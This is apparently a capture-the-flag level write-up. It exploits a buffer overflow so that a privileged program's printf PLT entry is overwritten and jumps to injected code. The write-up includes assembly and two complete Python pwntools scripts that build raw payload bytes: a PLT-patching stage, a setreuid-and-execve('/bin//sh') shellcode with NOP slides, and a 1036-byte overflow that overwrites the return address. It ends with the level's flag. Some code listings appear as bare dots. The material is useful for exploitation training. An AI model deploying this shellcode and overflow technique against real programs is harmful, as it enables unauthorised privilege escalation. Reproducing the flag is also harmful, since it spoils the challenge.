In this level we can use a buffer overflow to inject our code.
.
the safe function below:
.
while the unsafe function:
.
As you can see, we can use the buffer overflow to inject our code; however, the program drops our privileges before executing the unsafe function.
We will overwrite the plt_printf entry, and then, in the safe code which runs with the higher privileges, our shellcode will be executed.
This is the shellcode whose address we will place in the return address of the unsafe function:
mov eax, plt_printf_address
mov ebx, shellcode_address
mov [eax], ebx
push 1
pop eax
int 0x80 => exit()
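#!/usr/bin/python3
"""Emit the two-stage payload for this level as raw bytes on stdout.

Stage 1 (``shellcode_change_plt``) stores ``shellcode_address`` into the
printf entry at ``plt_printf_address`` and then calls exit().
Stage 2 (``shellcode``) calls setreuid(geteuid(), geteuid()) and then
execve("/bin//sh", argv).  Each stage is preceded by a NOP slide.

Diagnostics go to stderr so that stdout carries only the raw payload bytes
and can be captured as-is, e.g. ``export SHELLCODE=$(python3 shellcode.py)``
(the original silenced them by shadowing ``print``, which threw them away).

NOTE(review): both addresses are specific to one build/run of the target and
must be re-read before use.  Writing through the printf entry presupposes
that entry is writable at a fixed address (i.e. the binary is not built with
full RELRO / PIE) -- confirm against the target.
"""
import sys
from pwn import p32

NOP_SLIDE = 50


def log(*args, **kwargs):
    """Print diagnostics to stderr so stdout stays a clean byte stream."""
    print(*args, file=sys.stderr, **kwargs)


plt_printf_address = 0x0804c004
shellcode_address = 0xffffd56a

# Stage 1: redirect the printf entry to the stage-2 shellcode, then exit().
shellcode_change_plt = (
    b"\xb8" + p32(plt_printf_address)  # mov eax, plt_printf_address
    + b"\xbb" + p32(shellcode_address)  # mov ebx, shellcode_address
    + b"\x89\x18"  # mov [eax], ebx (store shellcode_address at [eax])
    + b"\x6a\x01"  # push 1 ; system call number (sys_exit)
    + b"\x58"  # pop eax
    + b"\xcd\x80"  # int 0x80 (exit())
)

# Stage 2: setreuid(geteuid(), geteuid()); execve("/bin//sh", argv); exit().
shellcode = (
    b"\x6a\x31"  # push 0x31 (49)
    b"\x58"  # pop eax
    b"\xcd\x80"  # int 0x80 (geteuid())
    b"\x89\xc3"  # mov ebx, eax (uid)
    b"\x89\xd9"  # mov ecx, ebx
    b"\x6a\x46"  # push 0x46 (70)
    b"\x58"  # pop eax
    b"\xcd\x80"  # int 0x80, setreuid(geteuid(), geteuid())
    b"\x31\xd2"  # xor edx, edx
    b"\x52"  # push edx, which is \0
    b"\x68\x2f\x2f\x73\x68"  # push "//sh"
    b"\x68\x2f\x62\x69\x6e"  # push "/bin"
    b"\x89\xe3"  # mov ebx, esp (now ebx points at "/bin//sh\0")
    b"\x52"  # push edx (push NULL into stack)
    b"\x53"  # push ebx (push pathname)
    b"\x89\xe1"  # mov ecx, esp (ecx is argv)
    b"\xb0\x0b"  # mov al, 0x0b (11)
    b"\xcd\x80"  # int 0x80 (execve("/bin//sh", argv))
    b"\x6a\x01"  # push 1 ; system call number (sys_exit)
    b"\x58"  # pop eax (sys_exit)
    b"\xcd\x80"  # int 0x80 (exit())
)

# Diagnostics (stderr only).
log("Shellcode code is:")
log("setreuid(geteuid(), geteuid())")
log("execv(\"/bin//sh\", argv)")

# NOP slide (\x90) before each stage.
nop_slide = b"\x90" * NOP_SLIDE
formatted_shellcode = nop_slide + shellcode_change_plt + nop_slide + shellcode

log("\nShellcode as formatted string:")
log("".join(f"\\x{byte:02x}" for byte in formatted_shellcode))

log("\nShellcode in hex format:")
log(formatted_shellcode.hex())

log(f"\nLength of shellcode is {len(formatted_shellcode)} bytes")

# The raw payload is the only thing written to stdout.
sys.stdout.buffer.write(formatted_shellcode)
# export SHELLCODE=$(python3 shellcode.py)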
#!/usr/bin/python3
"""Emit the overflow payload: 1036 filler bytes followed by the little-endian
address that lands in the saved return address of the unsafe function.

``shellcode_address`` has to be adjusted for the target run (see the writeup).
"""
import sys
from pwn import p32

shellcode_address = 0xffffd510

# Filler length up to the saved return address -- presumably buffer size plus
# saved registers; taken as given from the original payload, confirm in a debugger.
FILLER_LEN = 1036

payload = b"A" * FILLER_LEN + p32(shellcode_address)
sys.stdout.buffer.write(payload)
.
So, modify shellcode_address accordingly and execute these lines:
.
Flag: hCuwrgfqn